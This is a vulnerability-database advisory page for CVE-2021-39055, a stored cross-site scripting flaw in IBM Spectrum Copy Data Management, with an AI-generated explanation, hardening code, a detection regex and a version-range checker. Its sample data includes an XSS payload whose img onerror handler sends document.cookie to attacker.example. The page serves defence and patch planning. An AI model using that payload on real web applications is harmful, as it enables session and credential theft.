VYPR
Unrated severity · NVD Advisory · Published Mar 14, 2022 · Updated Sep 16, 2024

CVE-2021-39055

Description

IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 contains a cross-site scripting (XSS) vulnerability in its Web UI that lets an authenticated user inject arbitrary JavaScript which then runs in other users' browser sessions, with potential disclosure of session credentials. The advisory wording ("embed arbitrary JavaScript code in the Web UI") is consistent with stored XSS, although IBM's description does not state stored versus reflected explicitly.

Vulnerability

IBM Spectrum Copy Data Management versions 2.2.0.0 through 2.2.14.3 contain a cross-site scripting (XSS) vulnerability in the Web UI. The flaw allows authenticated users to embed arbitrary JavaScript code that the UI later renders without adequate output encoding, so the script executes in the browser context of other users who view the affected page [1]. The CVSS vector's PR:L component indicates that ordinary low-privileged accounts suffice; no administrative rights are needed to plant the payload. The narrative on this page treats the issue as stored XSS: the injected script persists in application data and fires whenever another user loads the interface that displays it. That classification is inferred from the advisory's wording rather than stated by IBM.

Exploitation

An attacker needs a valid user account with permission to reach the Web UI components that accept and store unsanitized input. The attacker submits a script payload through a vulnerable input field (for example a configuration parameter or a free-text form field; the advisory does not name the specific field). When another user, including a privileged administrator, views the page that renders the stored value, the injected JavaScript executes in that user's browser session. The only interaction the victim must perform is loading the affected page, which is exactly what the CVSS UI:R (user interaction required) component captures [1]. Because the payload persists, it fires for every subsequent viewer until the stored value is removed.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session within the IBM Spectrum Copy Data Management Web UI. The script can alter the behaviour of the interface, read data the victim is authorised to see, and issue requests to the application's backend with the victim's authority. Session credentials such as cookies or bearer tokens may be exfiltrated directly; note that a cookie flagged HttpOnly is not readable from document.cookie, but an attacker-controlled script running inside the session can still drive the application on the victim's behalf without ever reading the cookie. The CVSS vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) evaluates to a base score of 5.4 (Medium) under CVSS 3.x: low confidentiality and integrity impact, no availability impact, and a scope change because the code executes in the victim's browser rather than in the vulnerable component itself [1].
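The exploitation and impact described above reduce to one mechanism: a stored value is interpolated into HTML without output encoding. The following is an added example, not IBM's code or any code from the product; the record layout, field names, table template and payload are all constructed for illustration. It shows the vulnerable rendering path beside the hardened one, a simple sweep that flags already-stored values which would be parsed as markup, and the response headers that limit damage when encoding is missed.

```javascript
// Added example (not from IBM Spectrum Copy Data Management): stored XSS in a web UI,
// shown as a vulnerable HTML renderer next to its hardened form. All names and data
// below are hypothetical.

// Output encoding for the HTML text and attribute contexts.
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
}[c]));

// Constructed sample records, as a low-privileged user might submit them through the UI.
// The second record carries a payload that exfiltrates document.cookie when rendered raw.
const storedRecords = [
  { name: 'nightly-backup', description: 'Copies the prod volume' },
  { name: 'probe', description: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
];

// Vulnerable renderer: stored text is interpolated straight into markup, so the browser
// parses the attacker's <img> tag and runs its onerror handler in the viewer's session.
function renderVulnerable(records) {
  return records
    .map((r) => `<tr><td>${r.name}</td><td>${r.description}</td></tr>`)
    .join('\n');
}

// Hardened renderer: every untrusted value is encoded at the point of output.
function renderSafe(records) {
  return records
    .map((r) => `<tr><td>${escapeHtml(r.name)}</td><td>${escapeHtml(r.description)}</td></tr>`)
    .join('\n');
}

// Post-upgrade sweep: flag stored values that would be treated as active content if
// emitted unencoded (tag openers, inline event handlers, javascript: URLs).
function findSuspiciousRecords(records) {
  const active = /<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript:/i;
  return records
    .filter((r) => Object.values(r).some((v) => active.test(String(v))))
    .map((r) => r.name);
}

// Defence in depth: a CSP without 'unsafe-inline' blocks the onerror handler even if an
// encoding gap remains, and HttpOnly keeps the session cookie out of document.cookie.
// Neither removes the need to encode output; an in-session script can still call the API.
function hardeningHeaders(sessionToken) {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'Set-Cookie': `session=${encodeURIComponent(sessionToken)}; Secure; HttpOnly; SameSite=Lax`,
  };
}

// Stand-alone demonstration.
console.log('vulnerable:\n' + renderVulnerable(storedRecords));
console.log('hardened:\n' + renderSafe(storedRecords));
console.log('suspicious records:', findSuspiciousRecords(storedRecords));
```

The escaping is applied at render time rather than on input because the same stored value may later be emitted into a different context (JSON, a log line, an email) where HTML entities would be wrong; the sweep is what you run over existing data after upgrading, since a fix to the renderer does nothing about payloads that were stored before it.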

Mitigation

IBM released a fixed version to address this vulnerability. The security bulletin, as summarised on this page, advises upgrading to IBM Spectrum Copy Data Management version 2.2.14.4 or later; confirm the exact fixed build against the IBM support page before scheduling the upgrade. There is no known workaround that fully mitigates the vulnerability without applying the patch, so the update should be applied as soon as possible [1]. Two follow-ups are worth doing alongside the upgrade: review stored configuration and free-text fields for script content, since a payload planted before the fix remains in the data and the narrative above describes the issue as persistent; and, if there is any indication that an administrator viewed a tainted page, invalidate active Web UI sessions and rotate any credentials that could have been exposed. The Patches count below tracks public source commits, which do not exist for this proprietary product; the fix ships as a product release rather than as a visible patch.
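Deciding which hosts need the upgrade means comparing deployed build numbers against the affected range in the advisory, 2.2.0.0 through 2.2.14.3 inclusive. The helper below is an added example, not IBM tooling; the inventory records are constructed, and the only facts it encodes are the range boundaries from the CVE description. It compares versions numerically per segment, because a string comparison would place 2.2.9.0 above 2.2.14.3 and miss an affected host.

```javascript
// Added example (not IBM tooling): check deployed IBM Spectrum Copy Data Management
// builds against the affected range stated in the CVE description. Inventory data is constructed.

function parseVersion(v) {
  const parts = String(v).trim().split('.');
  if (parts.length === 0 || parts.some((p) => !/^\d+$/.test(p))) {
    throw new Error(`unparseable version: ${v}`);
  }
  return parts.map(Number);
}

// Segment-wise numeric comparison returning -1, 0 or 1. A missing trailing segment
// counts as 0, so "2.2.14" equals "2.2.14.0".
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] ?? 0;
    const y = pb[i] ?? 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Boundaries taken from the CVE-2021-39055 description (inclusive on both ends).
const AFFECTED_RANGE = { from: '2.2.0.0', through: '2.2.14.3' };

function isAffected(version, range = AFFECTED_RANGE) {
  return compareVersions(version, range.from) >= 0 && compareVersions(version, range.through) <= 0;
}

// Constructed inventory, as an asset list might report it. Hostnames are hypothetical.
const inventory = [
  { host: 'cdm-01', version: '2.2.9.0' },   // lexically "greater" than 2.2.14.3, actually inside the range
  { host: 'cdm-02', version: '2.2.14.3' },  // last affected build
  { host: 'cdm-03', version: '2.2.15.0' },  // above the range
  { host: 'cdm-04', version: '2.1.8.0' },   // below the range
];

function affectedHosts(list) {
  return list.filter((h) => isAffected(h.version)).map((h) => h.host);
}

// Stand-alone demonstration of the pitfall and the correct answer.
console.log('string compare says 2.2.9.0 > 2.2.14.3:', '2.2.9.0' > '2.2.14.3');
console.log('numeric compare:', compareVersions('2.2.9.0', '2.2.14.3'));
console.log('hosts needing the upgrade:', affectedHosts(inventory));
```

Feed it whatever version string the product exposes for each host; the parser rejects anything that is not dotted integers so that a malformed or blank field surfaces as an error rather than silently passing as "not affected".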

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2 listed

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

2 listed

News mentions

No linked articles in our index yet.